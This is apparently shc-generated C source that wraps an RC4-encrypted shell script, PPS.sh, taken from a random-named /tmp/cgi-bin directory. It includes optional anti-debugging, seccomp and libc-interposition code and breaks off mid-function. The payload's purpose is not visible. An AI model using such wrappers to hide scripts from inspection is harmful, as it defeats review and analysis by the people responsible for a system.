#if 0
	shc Version 4.0.3, Generic Shell Script Compiler
	GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>

	shc -r -f /tmp/cgi-bin/abdhkojdgjjaa12as23j891dgz1_TAC/PPS.sh 
#endif

static  char data [] = 
#define      chk1_z	22
#define      chk1	((&data[0]))
	"\147\073\341\316\263\071\044\305\157\037\000\333\344\254\162\277"
	"\245\207\364\275\220\267\077\033\270\104\107"
#define      date_z	1
#define      date	((&data[27]))
	"\130"
#define      msg2_z	19
#define      msg2	((&data[28]))
	"\003\145\061\312\155\133\307\040\132\350\277\101\134\221\312\266"
	"\336\051\057\046\325\057\205"
#define      lsto_z	1
#define      lsto	((&data[51]))
	"\061"
#define      tst1_z	22
#define      tst1	((&data[56]))
	"\306\165\145\276\241\255\241\056\334\133\245\316\352\016\002\022"
	"\057\232\051\117\333\252\066\031\020\256"
#define      rlax_z	1
#define      rlax	((&data[78]))
	"\260"
#define      shll_z	10
#define      shll	((&data[79]))
	"\046\300\022\140\032\160\006\052\375\177\163"
#define      msg1_z	65
#define      msg1	((&data[92]))
	"\146\112\227\160\015\342\157\111\304\114\122\305\222\214\167\013"
	"\332\001\201\164\050\051\151\251\124\354\304\100\302\263\207\042"
	"\317\061\010\067\104\212\114\117\365\126\336\356\140\133\212\045"
	"\010\051\236\061\251\024\023\071\352\033\031\110\016\027\361\356"
	"\223\345\275\101\023\347\142\001\016\067\061\223\237\000\243"
#define      inlo_z	3
#define      inlo	((&data[169]))
	"\346\356\050"
#define      text_z	4078
#define      text	((&data[326]))
	"\231\321\052\017\005\055\166\170\114\225\060\262\340\162\305\310"
	"\324\307\326\014\370\152\253\371\016\301\252\324\234\321\000\066"
	"\242\053\105\250\131\274\040\245\122\121\127\062\303\034\373\230"
	"\344\321\245\334\074\120\326\112\021\200\037\256\122\037\344\365"
	"\113\052\235\244\346\276\111\071\020\240\153\323\275\146\154\241"
	"\070\021\176\165\142\124\277\163\325\336\042\047\376\006\034\111"
	"\060\272\355\027\170\066\120\210\327\274\134\225\043\310\067\134"
	"\332\266\321\074\012\220\260\340\157\322\010\155\330\045\266\011"
	"\337\243\040\127\331\161\337\261\055\073\107\121\004\176\255\336"
	"\064\176\032\077\017\312\037\176\235\047\172\253\200\135\075\356"
	"\107\225\236\203\331\005\347\011\273\265\216\243\370\355\241\337"
	"\051\347\062\254\062\337\352\016\107\036\277\030\147\073\067\043"
	"\317\360\256\377\336\073\351\136\263\234\215\364\221\336\057\340"
	"\124\321\026\233\171\321\157\030\124\361\124\010\172\361\242\373"
	"\024\202\266\036\135\053\203\254\217\133\244\003\174\175\322\370"
	"\312\263\105\303\373\051\057\014\346\263\321\215\233\357\110\176"
	"\012\352\100\152\024\073\154\360\342\036\337\026\232\330\350\167"
	"\177\100\254\016\024\210\242\175\271\352\162\257\112\264\332\156"
	"\133\272\313\176\027\260\260\225\314\214\121\002\255\220\221\261"
	"\361\013\203\363\245\322\020\003\210\370\347\367\172\246\355\362"
	"\127\047\145\271\167\107\177\124\172\031\354\216\051\206\337\010"
	"\020\361\274\175\005\041\301\262\374\121\073\362\077\212\277\063"
	"\107\217\022\103\304\267\071\060\070\053\027\207\044\371\175\347"
	"\326\241\223\130\370\047\261\077\326\177\127\244\242\041\165\277"
	"\074\253\346\265\003\201\160\374\036\117\134\136\306\221\163\143"
	"\033\065\003\000\014\345\241\360\215\221\162\034\156\176\270\127"
	"\170\245\270\076\127\134\037\204\207\270\321\021\012\263\247\004"
	"\114\342\314\121\114\021\153\354\212\325\164\345\274\221\317\015"
	"\003\013\277\201\011\070\136\233\356\026\153\317\043\235\123\267"
	"\116\320\001\005\101\050\105\355\210\023\323\134\175\326\076\322"
	"\046\156\026\132\204\100\136\171\122\002\253\240\220\162\250\352"
	"\227\033\347\355\025\321\115\312\372\105\046\315\305\342\153\366"
	"\326\334\156\336\212\141\311\040\255\005\054\300\160\363\103\053"
	"\036\074\120\341\255\262\333\330\113\021\254\252\232\313\016\055"
	"\023\007\245\032\340\047\165\133\053\252\247\177\233\147\175\015"
	"\247\335\147\156\065\250\350\147\300\336\323\345\101\047\100\244"
	"\054\033\246\001\332\352\266\160\056\346\354\112\141\220\024\310"
	"\273\313\065\103\020\214\362\111\362\145\241\203\110\274\052\115"
	"\336\245\327\214\153\343\064\270\363\155\256\005\131\112\256\317"
	"\035\327\037\273\345\010\113\333\151\040\253\116\255\014\350\371"
	"\333\233\314\143\345\243\277\324\274\151\154\162\057\115\331\006"
	"\303\167\123\107\315\237\043\361\065\017\172\071\342\333\352\332"
	"\174\116\041\122\340\322\176\306\111\274\073\227\240\255\331\321"
	"\226\040\146\306\242\305\135\301\263\341\153\136\356\354\240\163"
	"\232\206\062\100\210\374\076\160\261\000\014\375\136\334\162\316"
	"\056\246\170\364\341\370\054\170\302\132\235\265\210\040\266\313"
	"\310\127\031\227\051\206\260\055\173\130\030\207\060\012\146\261"
	"\331\051\211\226\114\243\322\227\031\243\212\041\205\074\035\141"
	"\175\200\220\064\173\160\015\301\033\364\164\045\354\357\201\073"
	"\300\362\267\304\022\071\251\016\201\017\140\266\032\212\356\377"
	"\040\157\237\261\017\127\364\174\301\312\206\122\211\132\152\256"
	"\122\331\131\320\241\265\252\221\255\054\106\054\077\003\241\052"
	"\001\302\126\035\136\353\360\030\255\273\052\371\010\273\224\371"
	"\144\361\177\201\104\223\333\026\336\102\240\260\313\251\313\273"
	"\104\357\366\354\061\241\375\203\332\240\341\024\247\177\162\103"
	"\036\312\346\007\374\175\075\070\305\055\322\020\006\220\337\333"
	"\111\100\265\100\054\303\142\170\152\370\127\150\110\072\075\145"
	"\277\211\147\056\324\274\031\015\146\226\365\253\315\101\314\112"
	"\025\223\022\270\276\374\264\042\141\272\303\201\142\020\014\022"
	"\371\122\055\242\161\276\213\103\056\232\171\260\307\150\365\077"
	"\237\210\147\032\140\317\340\063\112\245\266\274\121\034\021\266"
	"\334\120\012\275\310\241\105\167\273\264\270\141\161\160\372\040"
	"\025\226\014\360\106\176\320\210\141\343\274\016\255\360\116\154"
	"\316\042\272\373\261\343\120\326\347\062\125\352\016\304\207\004"
	"\254\367\106\301\114\136\137\031\134\130\101\363\345\113\235\357"
	"\241\004\160\245\333\207\312\152\364\222\211\160\261\230\376\056"
	"\055\305\227\000\246\170\047\254\125\203\364\327\365\354\233\074"
	"\231\327\225\341\125\251\213\265\004\273\253\016\145\225\375\376"
	"\267\316\171\266\344\034\252\070\224\001\125\341\243\004\212\347"
	"\073\001\305\006\014\371\007\122\171\127\132\227\056\134\062\065"
	"\302\117\357\214\043\305\372\353\265\107\156\016\034\317\132\134"
	"\072\013\163\227\032\245\304\331\002\125\164\150\166\263\100\142"
	"\102\367\001\364\341\041\013\005\320\070\157\050\302\111\343\133"
	"\332\330\341\116\056\155\322\016\343\255\270\051\006\316\152\141"
	"\206\040\331\171\017\362\311\002\041\050\046\015\357\246\266\010"
	"\051\125\262\105\070\127\210\162\022\233\066\324\276\204\101\277"
	"\113\172\321\362\215\226\046\116\306\370\226\350\227\001\104\312"
	"\353\377\347\145\343\003\244\222\103\106\052\256\346\044\150\137"
	"\237\003\236\335\377\143\107\170\357\254\152\227\300\172\054\311"
	"\102\220\227\010\102\126\365\351\246\057\155\220\114\076\363\071"
	"\223\205\101\332\240\010\227\173\350\345\214\172\264\103\301\172"
	"\033\251\001\106\241\054\134\153\327\244\267\241\064\304\327\147"
	"\003\257\176\074\000\364\225\005\112\074\041\032\351\133\040\126"
	"\246\354\245\221\250\123\340\314\010\253\034\063\303\137\013\167"
	"\211\217\340\122\061\236\043\354\057\012\013\166\366\250\134\126"
	"\274\177\124\014\237\313\302\364\275\255\205\201\216\127\343\330"
	"\074\263\324\067\111\040\143\014\043\106\142\076\116\232\367\301"
	"\357\315\203\101\075\112\273\004\235\215\174\353\125\363\271\214"
	"\312\160\143\373\227\320\051\364\061\361\011\175\352\126\356\234"
	"\114\161\246\225\111\171\253\235\071\141\223\307\170\162\154\053"
	"\317\116\363\266\327\111\067\327\354\352\023\232\023\324\225\133"
	"\362\167\136\271\154\372\104\216\004\273\124\353\031\133\031\072"
	"\331\061\270\007\360\246\046\066\333\246\013\247\062\356\250\220"
	"\026\301\051\147\117\067\207\164\240\317\215\172\036\132\331\132"
	"\365\070\271\104\251\307\077\111\074\015\053\017\027\301\245\064"
	"\352\300\073\026\351\247\130\344\047\114\156\130\031\124\115\151"
	"\143\164\240\011\036\357\205\322\362\311\045\120\153\076\127\042"
	"\203\011\335\142\125\207\130\055\367\270\216\312\042\301\062\055"
	"\363\241\116\304\145\263\271\034\272\264\323\250\170\221\027\265"
	"\342\312\000\042\316\023\251\174\043\030\300\127\042\254\026\176"
	"\074\302\250\227\255\160\342\244\175\346\314\121\336\220\275\333"
	"\220\111\310\305\202\224\206\326\120\307\376\360\135\251\132\266"
	"\101\145\004\321\126\343\023\342\076\143\173\005\252\122\102\237"
	"\246\043\332\161\341\071\064\174\172\040\200\102\075\143\234\047"
	"\255\217\366\043\160\324\050\244\052\331\330\130\274\336\332\256"
	"\010\334\256\102\051\263\302\315\016\060\000\123\237\172\200\355"
	"\263\234\207\264\115\322\220\267\025\122\051\131\031\000\157\122"
	"\330\333\273\321\362\354\233\232\002\255\254\227\354\213\336\011"
	"\310\155\037\272\302\026\130\341\067\301\316\143\062\365\246\040"
	"\155\042\246\377\245\273\125\336\003\224\066\140\120\362\004\350"
	"\333\162\145\010\037\243\344\112\327\130\340\322\035\161\064\242"
	"\011\023\122\230\070\004\375\024\105\233\127\151\374\375\170\324"
	"\105\036\010\323\114\136\342\346\341\130\155\343\144\113\263\033"
	"\044\253\004\013\167\231\066\365\011\324\170\276\371\136\011\025"
	"\165\162\344\254\021\250\210\117\204\365\173\335\004\046\171\152"
	"\251\115\066\262\000\210\067\177\263\323\206\236\334\073\230\356"
	"\270\156\356\210\363\101\306\002\026\071\373\013\041\302\361\141"
	"\010\350\114\326\345\336\221\035\270\352\140\124\036\116\121\174"
	"\232\256\360\250\270\244\036\026\200\063\304\114\021\155\007\114"
	"\245\065\006\306\214\150\012\361\211\137\150\120\031\056\046\133"
	"\232\210\353\300\333\073\272\312\021\026\160\034\301\177\266\164"
	"\371\237\207\270\243\074\374\270\215\327\265\031\100\264\171\340"
	"\050\172\044\255\102\352\132\027\033\065\216\256\147\215\347\055"
	"\307\147\053\171\266\065\140\151\076\344\235\361\162\133\200\236"
	"\043\265\146\376\216\146\141\167\265\057\334\332\330\051\372\064"
	"\105\026\010\254\035\206\022\305\331\210\272\370\106\005\166\206"
	"\306\021\307\346\332\160\060\266\270\163\370\173\366\033\004\304"
	"\017\034\256\116\236\075\357\001\115\101\100\220\041\064\224\376"
	"\157\031\141\110\140\053\170\213\347\360\344\214\347\150\246\017"
	"\366\017\353\067\343\211\052\311\246\317\010\144\214\064\375\357"
	"\117\346\345\171\320\334\067\217\251\346\017\307\124\250\376\032"
	"\276\212\001\302\371\015\362\102\102\372\127\072\101\305\312\205"
	"\302\011\323\056\310\024\267\272\357\200\117\303\312\206\121\136"
	"\373\276\354\233\131\006\013\164\213\225\305\013\364\076\174\327"
	"\100\365\114\331\351\024\120\315\112\062\361\251\121\170\146\241"
	"\162\022\331\005\172\240\002\021\115\072\036\155\371\050\005\247"
	"\347\151\225\126\370\231\271\041\350\127\022\114\022\365\032\250"
	"\254\026\140\367\014\155\330\341\266\251\046\246\372\060\075\250"
	"\362\062\322\104\200\000\304\324\036\131\047\030\131\234\123\064"
	"\355\136\270\362\267\270\235\054\265\106\037\047\143\374\026\161"
	"\374\114\341\337\001\303\302\343\365\042\315\110\134\265\067\224"
	"\127\216\172\343\314\105\330\255\033\145\034\351\115\332\160\150"
	"\143\333\234\135\225\015\014\343\045\234\026\301\327\365\157\322"
	"\051\367\113\103\165\261\160\276\103\165\137\330\145\037\316\163"
	"\346\175\254\270\263\027\133\255\350\022\146\212\157\371\170\055"
	"\114\002\347\020\045\322\053\205\106\301\230\247\225\170\114\205"
	"\053\026\260\176\223\127\075\137\324\343\120\105\037\341\302\045"
	"\104\267\216\105\163\356\175\021\200\300\350\120\012\361\115\007"
	"\024\257\360\302\274\017\034\043\053\077\073\350\262\150\130\130"
	"\127\216\327\176\002\062\034\036\324\036\175\047\327\347\135\060"
	"\054\167\352\047\257\055\141\050\257\321\173\017\230\151\002\071"
	"\304\140\232\114\200\321\105\321\336\261\121\050\003\351\320\256"
	"\076\000\237\132\063\253\073\374\027\340\215\365\303\105\104\206"
	"\270\026\027\077\047\222\316\017\225\076\134\006\277\303\075\076"
	"\367\104\301\074\230\225\063\112\072\353\212\063\334\024\262\042"
	"\127\161\302\326\312\125\301\062\016\233\100\376\252\052\246\050"
	"\126\330\136\051\305\033\340\233\163\006\072\152\333\342\355\112"
	"\304\374\134\103\147\337\114\252\042\006\105\001\100\216\273\341"
	"\054\127\256\250\251\222\036\005\073\004\000\220\053\243\220\343"
	"\372\155\350\220\224\304\350\237\046\036\337\104\057\355\062\216"
	"\374\325\314\105\003\325\275\051\035\232\153\230\100\013\024\055"
	"\314\351\166\376\251\103\305\312\260\215\246\276\236\270\142\360"
	"\121\271\150\327\031\105\056\033\023\363\132\265\350\321\277\016"
	"\150\025\352\103\032\020\170\136\017\065\117\161\130\106\165\276"
	"\070\276\273\255\007\275\241\002\337\053\050\352\305\077\062\114"
	"\337\043\047\340\324\017\251\214\025\252\354\073\345\140\372\266"
	"\204\167\302\201\016\073\331\341\016\103\102\331\061\137\214\226"
	"\116\020\277\276\220\132\374\141\276\314\007\146\100\156\262\101"
	"\230\025\006\353\074\351\353\327\342\214\216\364\265\237\273\112"
	"\335\100\013\223\210\016\310\017\305\266\373\124\356\064\270\052"
	"\013\247\050\362\143\245\140\162\322\316\073\213\355\311\246\022"
	"\255\011\111\026\117\170\021\344\231\310\040\220\161\116\132\242"
	"\033\045\257\360\244\073\246\361\331\022\114\110\030\213\150\375"
	"\202\022\223\376\377\072\271\305\161\116\305\153\046\266\164\137"
	"\045\227\216\057\314\034\226\265\245\220\247\226\270\250\031\203"
	"\062\030\000\153\276\203\057\035\154\372\150\242\115\341\242\217"
	"\227\272\245\135\161\143\012\115\000\201\356\223\165\052\251\167"
	"\335\133\150\260\251\302\057\036\233\325\245\041\024\016\127\021"
	"\273\341\164\234\162\314\204\077\167\334\026\200\106\273\270\276"
	"\311\277\055\045\357\251\367\026\237\077\155\034\217\327\231\153"
	"\321\302\231\266\215\275\126\174\320\144\065\244\217\107\207\333"
	"\106\113\207\327\150\103\042\060\312\015\271\201\151\355\364\156"
	"\351\236\130\173\000\270\235\167\062\212\241\231\242\342\166\054"
	"\105\356\042\055\353\026\143\021\124\005\302\100\320\015\373\324"
	"\163\372\253\273\202\014\147\126\016\300\123\243\167\114\255\371"
	"\326\042\123\003\267\320\131\176\355\363\030\113\335\036\123\125"
	"\006\305\333\352\337\016\256\134\251\303\223\302\055\231\154\023"
	"\112\233\200\001\042\063\121\020\162\260\116\213\272\330\242\240"
	"\015\201\056\260\176\330\145\101\345\210\225\127\212\233\143\017"
	"\166\045\067\166\120\045\367\136\365\270\205\177\075\217\235\152"
	"\243\140\073\144\312\324\243\011\137\031\025\153\064\367\226\214"
	"\066\246\026\004\275\224\252\151\367\025\061\106\320\072\043\157"
	"\155\057\241\063\247\157\161\147\047\373\232\356\170\371\213\320"
	"\060\017\034\071\230\075\214\302\326\122\376\111\235\364\156\050"
	"\200\063\314\021\212\003\322\306\037\161\312\212\310\154\142\153"
	"\040\102\131\271\022\173\003\125\246\230\245\274\135\015\104\151"
	"\206\005\232\356\060\244\340\237\224\321\320\140\002\047\002\065"
	"\002\003\367\221\374\375\370\142\331\140\222\042\373\344\221\241"
	"\335\225\204\170\254\160\232\056\050\175\214\307\031\361\165\001"
	"\171\274\013\232\272\357\350\331\120\302\121\370\144\312\124\330"
	"\204\236\045\156\325\161\171\211\022\102\304\061\336\165\375\157"
	"\176\203\271\331\310\173\274\012\316\077\163\351\064\173\351\261"
	"\233\101\031\366\057\126\336\273\140\326\126\117\341\102\202\032"
	"\100\327\330\031\207\301\161\070\331\023\174\032\212\356\274\254"
	"\262\227\165\131\332\334\317\020\207\126\005\171\340\067\251\344"
	"\135\315\256\016\043\115\263\024\266\144\244\027\312\122\217\066"
	"\252\037\217\111\120\071\155\047\253\233\246\000\036\377\341\351"
	"\057\157\311\071\371\006\253\103\146\100\312\213\132\204\030\374"
	"\265\127\117\064\343\177\256\021\374\234\371\005\360\171\361\200"
	"\267\207\047\015\101\047\205\372\373\172\243\340\127\250\157\274"
	"\222\303\235\132\130\341\172\171\213\276\240\170\112\165\042\312"
	"\372\042\017\234\145\342\063\276\174\017\152\166\045\240\243\323"
	"\035\027\130\015\370\076\172\104\300\266\367\277\274\256\330\147"
	"\066\123\155\342\145\133\165\000\046\222\040\306\257\320\055\162"
	"\137\357\217\217\070\344\363\030\051\201\155\105\026\206\263\325"
	"\051\365\035\305\105\004\207\031\316\067\230\345\231\110\247\245"
	"\375\240\133\276\077\225\336\012\372\071\345\357\060\377\157\002"
	"\367\234\326\047\026\122\077\005\056\324\221\252\054\052\273\356"
	"\246\041\274\017\340\232\145\007\063\317\004\325\362\362\330\251"
	"\326\050\002\174\115\212\166\114\015\044\022\011\332\360\324\255"
	"\174\003\334\262\251\122\352\161\217\225\073\273\306\344\030\010"
	"\074\216\124\336\270\247\104\033\360\154\264\322\031\073\171\164"
	"\265\236\050\136\127\154\257\025\114\074\322\214\025\221\364\001"
	"\137\322\210\374\242\056\063\037\026\172\067\306\001\042\027\276"
	"\257\354\341\032\367\173\376\006\374\164\024\107\023\320\032\120"
	"\313\206\361\150\370\217\215\265\226\320\014\137\245\000\305\210"
	"\335\011\240\300\335\221\016\316\103\226\204\062\003\265\323\235"
	"\356\270\077\307\316\363\127\243\341\263\002\021\000\221\142\327"
	"\351\226\011\276\001\054\303\231\106\121\201\155\157\242\121\065"
	"\071\221\105\061\275\152\155\235\131\263\103\303\265\236\153\022"
	"\015\362\311\332\040\260\344\225\111\271\252\267\230\273\211\103"
	"\024\077\317\277\140\163\141\156\355\371\333\316\172\165\122\056"
	"\162\207\012\217\252\275\021\131\051\141\152\130\343\064\321\260"
	"\140\351\361\067\114\054\114\334\230\273\333\112\033\023\127\045"
	"\247\360\027\115\362\063\000\001\045\300\102\111\373\122\075\043"
	"\274\010\172\334\354\101\220\361\370\153\121\303\000\017\140\317"
	"\001\267\143\212\215\035\030\364\152\257\317\173\036\043\251\252"
	"\070\250\322\122\346\364\107\020\200\073\321\131\250\127\337\231"
	"\123\200\273\252\345\015\223\054\211\307\031\034\353\024\150\227"
	"\002\221\336\234\101\317\347\016\120\152\315\205\214\223\141\357"
	"\163\123\052\137\216\372\266\366\204\174\143\365\240\252\251\035"
	"\216\072\256\004\130\217\132\273\056\243\377\331\116\135\262\237"
	"\316\273\361\177\263\114\077\142\003\232\162\055\106\230\161\225"
	"\301\351\127\330\213\365\224\256\223\215\165\041\315\011\250\313"
	"\301\113\225\061\330\161\066\314\130\111\201\262\201\063\306\260"
	"\062\017\145\223\157\165\304\375\137\266\072\071\027\315\273\316"
	"\350\064\277\200\002\060\153\003\054\056\070\330\031\165\035\217"
	"\131\134\227\212\021\001\323\014\163\150\142\110\001\221\145\264"
	"\256\351\105\360\004\240\251\351\223\002\374\044\053\140\066\257"
	"\246\232\266\122\224\202\273\326\214\221\176\125\252\157\320\076"
	"\314\115\263\222\355\242\045\134\077\304\223\011\273\362\177\311"
	"\242\213\204\256\156\153\245\113\144\127\324\041\107\217\054\365"
	"\164\341\060\377\365\267\224\113\311\033\370\270\206\265\230\104"
	"\047\107\367\005\111\325\004\306\220\301\212\223\015\272\322\310"
	"\300\073\003\314\244\224\341\056\156\342\153\103\277\053\026\217"
	"\034\110\303\177\162\306\374\210\000\155\062\132\146\265\103\127"
	"\324\005\304\351\234\226\233\265\371\350\352\103\343\323\257\351"
	"\211\031\037\345\345\335\371\370\002\355\070\156\110\151\120\177"
	"\316\111\347\310\214\053\133\125\205\220\262\121\244\161\303\246"
	"\312\167\011\112\174\177\222\365\102\361\231\154\024\201\105\000"
	"\243\051\071\233\054\166\024\165\005\054\206\021\012\340\353\063"
	"\205\330\351\267\046\064\172\021\065\205\157\201\242\174\322\101"
	"\232\056\022\311\151\132\140\165\215\042\001\007\254\250\332\056"
	"\331\005\026\375\265\301\011\311\165\066\347\274\226\177\020\213"
	"\157\101\101\024\104\152\345\146\353\165\114\241\176\054\104\237"
	"\203\036\021\142\320\077\236\027\220\242\226\075\201\313\274\234"
	"\012\313\147\052\112\004\122\065\172\237\327\371\313\033\230\116"
	"\072\252\261\013\351\120\042\171\363\271\267\164\204\164\021\217"
	"\100\170\271\212\175\014\300\367\253\227\360\167\263\211\306\356"
	"\063\170\371\034\310\034\226\273\325\116\060\132\302\102\351\003"
	"\272\243\215\067\257\116\057\133\345\037\322\231\251\230\207\334"
	"\021\201\371\331\236\220\225\164\336\306\316\241\010\270\244\303"
	"\133\062\373\013\200\052\146\146\112\071\377\363\322\207\317\343"
	"\011\311\274\247\131\122\034\067\030\353\330\041\243\175\344\377"
	"\257\337\012\057\011\161\226\123\252\226\106\175\036\026\140\047"
	"\337\035\317\071\157\353"
#define      opts_z	1
#define      opts	((&data[4578]))
	"\051"
#define      xecc_z	15
#define      xecc	((&data[4581]))
	"\306\216\330\222\207\123\106\007\346\326\301\333\331\114\012\226"
	"\144\171"
#define      tst2_z	19
#define      tst2	((&data[4599]))
	"\245\167\031\275\154\367\125\264\367\127\307\205\130\163\030\342"
	"\151\325\201\334\240\365\073"
#define      chk2_z	19
#define      chk2	((&data[4623]))
	"\021\035\357\135\050\046\263\307\266\073\314\073\221\220\013\170"
	"\207\236\062\300\167\366\050\176\027\010"
#define      pswd_z	256
#define      pswd	((&data[4704]))
	"\013\322\262\224\251\374\076\044\303\314\235\070\072\042\336\261"
	"\027\032\174\270\354\216\326\333\266\124\363\277\360\332\000\374"
	"\255\263\221\127\257\317\173\162\234\031\253\326\073\212\210\123"
	"\244\005\014\220\223\342\154\112\066\137\207\073\025\220\051\060"
	"\242\200\161\165\054\066\265\242\223\311\205\335\176\274\163\256"
	"\351\237\270\135\144\337\366\243\155\176\336\203\017\010\264\261"
	"\211\045\047\265\133\335\130\357\247\335\314\045\232\100\324\203"
	"\340\214\341\105\153\330\350\331\126\307\134\145\320\020\027\132"
	"\065\077\020\221\034\150\200\304\106\115\351\340\216\276\144\157"
	"\112\105\264\266\035\235\217\164\145\354\331\065\374\361\220\062"
	"\060\240\304\115\010\105\021\116\222\373\057\041\271\223\220\004"
	"\331\105\272\367\342\112\153\110\066\105\176\062\066\016\145\147"
	"\256\052\264\267\157\306\005\002\302\065\043\174\310\264\200\242"
	"\371\073\231\334\205\005\044\273\112\243\356\201\261\124\350\137"
	"\176\235\026\355\144\034\360\046\121\023\242\032\310\043\274\302"
	"\136\126\236\344\134\303\240\247\147\216\050\030\343\021\170\141"
	"\257\217\117\023\253\077\071\375\123\334\030\033\377\325\336\136"
	"\053\175\102\210\100\342\057\247\161\127\300\124\151\070\265\030"
	"\307\005\053\163\104\145\161\230\101\211\263\101\136\221\237\212"
	"\016\341\022\117\304\102\367\065\232\270\011\047\072\012\043\347"
	"\275\264\077\154\204\272\337\041\324\212"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

